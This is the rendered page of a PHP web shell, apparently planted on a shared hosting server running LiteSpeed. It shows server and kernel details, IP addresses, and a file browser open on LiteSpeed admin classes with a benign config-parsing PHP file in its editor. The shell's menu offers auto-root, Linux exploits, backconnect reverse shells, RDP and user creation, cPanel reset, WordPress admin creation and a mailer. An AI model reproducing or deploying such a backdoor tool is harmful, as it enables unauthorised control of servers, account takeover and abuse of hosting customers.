Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
local /
lsws /
admin /
html.6.2.2 /
classes /
[ HOME SHELL ]
Name
Size
Permission
Action
ws
[ DIR ]
drwxr-xr-x
CValidation.php
26.65
KB
-rw-r--r--
ConfData.php
860
B
-rw-r--r--
ConfigFile.php
13.87
KB
-rw-r--r--
ConfigFileEx.php
4.68
KB
-rw-r--r--
CustStatusCode.php
2.19
KB
-rw-r--r--
DATTR_HELP.php
773
B
-rw-r--r--
DATTR_HELP_ITEM.php
2.53
KB
-rw-r--r--
DAttrBase.php
12.42
KB
-rw-r--r--
DFileSect.php
582
B
-rw-r--r--
DPage.php
3.75
KB
-rw-r--r--
DTbl.php
17.52
KB
-rw-r--r--
DUtil.php
4.22
KB
-rw-r--r--
DispInfo.php
4.36
KB
-rw-r--r--
GUIBase.php
3.25
KB
-rw-r--r--
PathTool.php
3.02
KB
-rw-r--r--
XmlTreeBuilder.php
3.27
KB
-rw-r--r--
blowfish.php
25.68
KB
-rw-r--r--
jCryption.php
15.92
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ConfigFileEx.php
<?php class ConfigFileEx { // grep logging.log.fileName, no need from root tag, any distinctive point will do public static function grepTagValue($filename, $tags) { $contents = file_get_contents($filename); if (is_array($tags)) { $values = []; foreach ($tags as $tag) { $values[$tag] = ConfigFileEx::grepSingleTagValue($tag, $contents); } return $values; } return ConfigFileEx::grepSingleTagValue($tags, $contents); } public static function grepSingleTagValue($tag, &$contents) { $singleTags = explode('.', $tag); $cur_pos = 0; $end_tag = ''; foreach ($singleTags as $singletag) { $findtag = "<$singletag>"; $cur_pos = strpos($contents, $findtag, $cur_pos); if ($cur_pos === false) { break; } $cur_pos += strlen($findtag); $end_tag = "</$singletag>"; } if (!strlen($contents) || !strlen($end_tag)) { $last_pos = false; } else { $last_pos = strpos($contents, $end_tag, $cur_pos); } if ($last_pos !== false) { return substr($contents, $cur_pos, $last_pos - $cur_pos); } return null; } public static function loadHAVip($haconf) { if (!file_exists($haconf)) { return null; } $contents = file_get_contents($haconf); if ($contents === false) { return null; } if (preg_match_all('/<vip>(.+)<\/vip>/', $contents, $res)) { $r = $res[1]; $ips = []; foreach ($r as $vips) { $vipsl = preg_split("/[\s,]+/", trim($vips), -1, PREG_SPLIT_NO_EMPTY); $ips = array_merge($ips, $vipsl); } $ips = array_unique($ips); $finallist = []; foreach ($ips as $ip) { $finallist[$ip] = $ip; } return $finallist; } return null; } // other files public static function &loadMime($filename) { $lines = file($filename); if ($lines == false) { return false; } $mime = []; foreach ($lines as $line) { $c = strpos($line, '='); if ($c > 0) { $suffix = trim(substr($line, 0, $c)); $type = trim(substr($line, $c + 1)); $mime[$suffix] = array('suffix' => new CVal($suffix), 'type' => new CVal($type)); } } ksort($mime, SORT_STRING); reset($mime); return $mime; } public static function saveMime($filename, &$mime) { $fd = fopen($filename, 'w'); if (!$fd) { return false; } ksort($mime, SORT_STRING); reset($mime); foreach ($mime as $key => $entry) { if (strlen($key) < 8) { $key = substr($key . ' ', 0, 8); } $line = "$key = " . $entry['type']->GetVal() . "\n"; fputs($fd, $line); } fclose($fd); return true; } public static function &loadUserDB($filename) { if (PathTool::isDenied($filename)) { return false; } $lines = file($filename); $udb = []; if ($lines == false) { error_log('failed to read from ' . $filename); return $udb; } foreach ($lines as $line) { $line = trim($line); $parsed = explode(":", $line); if (is_array($parsed)) { $size = count($parsed); if ($size != 2 && $size != 3) { continue; } if (!strlen($parsed[0]) || !strlen($parsed[1])) { continue; } $user = []; if ($size >= 2) { $user['name'] = new CVal(trim($parsed[0])); $user['passwd'] = new CVal(trim($parsed[1])); } if ($size == 3 && strlen($parsed[2])) { $user['group'] = new CVal(trim($parsed[2])); } $udb[$user['name']->GetVal()] = $user; } } ksort($udb); reset($udb); return $udb; } public static function saveUserDB($filename, &$udb) { if (PathTool::isDenied($filename)) { return false; } $fd = fopen($filename, 'w'); if (!$fd) { return false; } ksort($udb); reset($udb); foreach ($udb as $name => $user) { $line = $name . ':' . $user['passwd']->GetVal(); if (isset($user['group'])) { $line .= ':' . $user['group']->GetVal(); } fputs($fd, "$line\n"); } fclose($fd); return true; } public static function &loadGroupDB($filename) { if (PathTool::isDenied($filename)) { return false; } $gdb = []; $lines = file($filename); if ($lines == false) { return $gdb; } foreach ($lines as $line) { $line = trim($line); $parsed = explode(':', $line); if (is_array($parsed) && count($parsed) == 2) { $nameval = trim($parsed[0]); $group = array( 'name' => new CVal($nameval), 'users' => new CVal(trim($parsed[1]))); $gdb[$nameval] = $group; } } ksort($gdb); reset($gdb); return $gdb; } public static function saveGroupDB($filename, &$gdb) { if (PathTool::isDenied($filename)) { return false; } $fd = fopen($filename, 'w'); if (!$fd) { return false; } ksort($gdb); reset($gdb); foreach ($gdb as $name => $entry) { $line = $name . ':' . $entry['users']->GetVal() . "\n"; fputs($fd, $line); } fclose($fd); return true; } }
Close